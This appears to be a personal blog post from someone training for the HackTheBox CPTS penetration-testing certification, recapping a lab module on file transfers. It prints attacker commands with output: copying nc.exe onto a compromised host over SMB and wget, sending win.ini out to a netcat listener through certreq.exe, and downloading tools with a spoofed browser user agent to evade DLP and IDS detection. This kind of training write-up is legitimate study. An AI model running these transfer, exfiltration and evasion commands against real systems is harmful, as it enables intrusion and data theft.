It’s been a few weeks since I’ve posted, but I’m happy to report that I’ve kept working on the CPTS modules and am a few ahead of this post at time of writing, so I’ll be backfilling for a while here with a ton of content that I’ve learned. There was a section after section 3, information gathering, titled ‘Vulnerability Assessment‘. I’ve decided not to dedicate an entire post to the concept as it’s relatively simple and not as applicable to the CPTS certification exam.
To summarize, vulnerability assessments are largely automated events where a platform or network is scanned via a vuln scanner and the output is concatenated into some nice visuals, usually in a format that the C-suite and compliance folks can read. There is a lot of value here for Sysadmins too, as it will list some common misconfigurations and many vulnerabilities that should be patched. Anyways, onto the meat and potatoes of this post:
File transfers. File transfers are probably the most important part of hacking anything, or at least the most important component of the process. This module covered some methods of transferring files both to and from Windows hosts, UNIX/Linux hosts, ‘living off the land’, and evading detection while doing so. Jumping into it, some neat Windows file transfer methods I used during the labs here:
I started a SMB server on my attacking machine using impacket, which is a python library that can be used to interact with network traffic.
Alecn0@htb[/htb]$ sudo impacket-smbserver share -smb2support /tmp/smbshare -user pwnd -password pwnd
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsedAfter starting the SMB server, you can copy files from the attacking machine to the compromised machine very simply:
C:\htb> net use n: \\10.10.X.X\share /user:pwnd pwnd
The command completed successfully.
C:\htb> copy n:\nc.exe
1 file(s) copied.
#####
C:\htb> copy \\10.10.X.X\share\nc.exe
1 file(s) copied.ezpz. Conversely with some more tinkering, we can enable upload on the SMB server as well, allowing to exfiltrate data from the compromised machine to an SMB share on the attack machine. I won’t list that here, as the process is a bit involved and I’m short on time. Onto the Linux section:
Linux has a ton of ways to perform file transfers, the simplest that I used was setting up a python webserver and initating a transfer via wget:
Attack Machine:
#Start a webserver
Alecno@htb[/htb]$ python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
----------------------------------
Compromised machine:
Alecno@htb[/htb]$ wget 10.10.X.X:8000/Upload.txt
--2022-05-20 08:13:05-- http://10.10.X.X:8000/Upload.txt
Connecting to 192.168.49.128:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 0 [text/plain]
Saving to: 'Upload.txt'
Upload.txt [ <=> ] 0 --.-KB/s in 0s
2022-05-20 08:13:05 (0.00 B/s) - ‘Upload.txt’ saved [0/0]This was simple enough, just make sure to start your fileserver in the same directory as the files you intend to transfer. Again, there’s an inverse but I’m just demoing some simple things I learned here a few weeks ago here and don’t want to get too technical.
Living off The land
This was a really cool section. The term ‘Living Off the Land‘ in a hacking context refers to the act of using native tools and binaries to perform actions on a machine. This means initiating file transfers and modification without downloading a specialized tool to do so. One of the ways taught in the course was to use the CertReq.exe utility to upload a windows file to a listening netcat connection on our attack machine:
C:\htb> certreq.exe -Post -config http://192.168.49.128:8000/ c:\windows\win.ini
Certificate Request Processor: The operation timed out 0x80072ee2 (WinHttp: 12002 ERROR_WINHTTP_TIMEOUT)
-------------------------------------
Attack machine:
Alecno_1@htb[/htb]$ sudo nc -lvnp 8000
listening on [any] 8000 ...
connect to [192.168.49.128] from (UNKNOWN) [192.168.49.1] 53819
POST / HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Content-Type: application/json
User-Agent: Mozilla/4.0 (compatible; Win32; NDES client 10.0.19041.1466/vb_release_svc_prod1)
Content-Length: 92
Host: 192.168.49.128:8000
; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1Essentially, the local certreq.exe tool thinks it’s posting a certificate when in reality it’s dumping a file to a listening connection on our attack machine. This can be useful when you have limited download/install capabilities or want to be a bit more stealthy. There’s a large project dedicated to living off the land and there are some excellent resources on LOLBAS for Windows and GTFOBins for Linux.
The last thing I want to talk about in this post is evading detection. Using some of these commands, especially some powershell commands, can cause the command to be flagged by DLP/IDS systems or firewalls if the useragent is set to something obvious like ‘kali-ftp’ or some other blatantly malicious agent. A neat way to get around this is to either use some of the misplaced trust binaries mentioned in living off the land or to change the useragent:
PS C:\htb> $UserAgent = [Microsoft.PowerShell.Commands.PSUserAgent]::Chrome
PS C:\htb> Invoke-WebRequest http://10.10.10.32/nc.exe -UserAgent $UserAgent -OutFile "C:\Users\Public\nc.exe"
-------------------------------------
Attack Box:
Alecn0@htb[/htb]$ nc -lvnp 80
listening on [any] 80 ...
connect to [10.10.10.32] from (UNKNOWN) [10.10.10.132] 51313
GET /nc.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) AppleWebKit/534.6
(KHTML, Like Gecko) Chrome/7.0.500.0 Safari/534.6
Host: 10.10.10.32
Connection: Keep-Alive
There are a ton of things in this module that I couldn’t even touch on, and it’s definitely something that I need to practice and revisit in depth prior to the exam. In the meantime, I think I’m going to complete a couple more of these fundamental modules and then start trying some of the boxes and CTF’s on HackTheBox and TryHackMe! I’ll post some walkthroughs of retired machines and some of my CTF/King Of The Hill wins and losses once I start getting more into it. Be on the lookout for some more posts over the next week or two and a whole new HackerBox Side Quest soon. Thanks for reading!
NordbySec 
Leave a comment